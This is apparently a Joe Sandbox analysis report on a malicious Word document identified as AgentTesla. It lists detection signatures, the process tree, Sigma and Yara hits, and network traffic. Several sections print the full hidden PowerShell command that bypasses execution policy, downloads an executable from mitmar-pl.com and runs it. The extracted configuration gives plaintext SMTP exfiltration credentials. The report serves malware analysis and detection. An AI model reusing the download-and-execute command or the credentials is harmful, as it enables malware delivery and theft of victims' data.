Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 478644.doc

Overview

General Information

Sample Name:478644.doc
Analysis ID:553100
MD5:c0f8f2fc481e9be7141d84b401edf1f7
SHA1:ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256:4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected AgentTesla
Sigma detected: Powershell download and execute file
Document exploit detected (creates forbidden files)
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Yara detected Costura Assembly Loader
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Sigma detected: Verclsid.exe Runs COM Object
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2724 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2904 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 1308 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 292 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • okcff.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Roaming\okcff.exe" MD5: E9416A322E9A796D45588BC4FB04CD45)
        • cmd.exe (PID: 2028 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1972 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2104 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2060 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1864 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2100 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1892 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2780 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2712 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2228 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 448 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2632 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2792 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1188 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 836 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1308 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2424 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1204 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • okcff.exe (PID: 2176 cmdline: C:\Users\user\AppData\Roaming\okcff.exe MD5: E9416A322E9A796D45588BC4FB04CD45)
    • verclsid.exe (PID: 2432 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2652 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
          • 0x325b:$sb1: -W Hidden
          • 0x324b:$sc1: -NoP
          • 0x3255:$sd1: -NonI
          • 0x3265:$se3: -ExecutionPolicy bypass
          • 0x3250:$sf1: -sta
          Click to see the 24 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          41.0.okcff.exe.400000.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            41.0.okcff.exe.400000.9.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              41.0.okcff.exe.400000.13.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                41.0.okcff.exe.400000.13.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  9.2.okcff.exe.3605ff0.7.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 26 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: PowerShell DownloadFileShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Verclsid.exe Runs COM ObjectShow sources
                    Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 2432
                    Sigma detected: PowerShell Download from URLShow sources
                    Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
                    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904

                    Data Obfuscation:

                    barindex
                    Sigma detected: Powershell download and execute fileShow sources
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 41.0.okcff.exe.400000.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: 478644.docVirustotal: Detection: 41%Perma Link
                    Source: 478644.docReversingLabs: Detection: 30%
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\okcff.exeJoe Sandbox ML: detected
                    Source: 41.0.okcff.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.7.unpackAvira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.9.unpackAvira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.13.unpackAvira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.11.unpackAvira: Label: TR/Spy.Gen8
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

                    Software Vulnerabilities:

                    barindex
                    Document exploit detected (drops PE files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: okcff[1].exe.0.drJump to dropped file
                    Document exploit detected (creates forbidden files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exeJump to behavior
                    Document exploit detected (process start blacklist hit)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global trafficDNS query: name: mitmar-pl.com
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]9_2_021AC348
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]9_2_021AC43D
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh9_2_021AC915
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh9_2_021AC920
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80
                    Source: Joe Sandbox ViewASN Name: WKD-ASIE WKD-ASIE
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 37.0.9.166 37.0.9.166
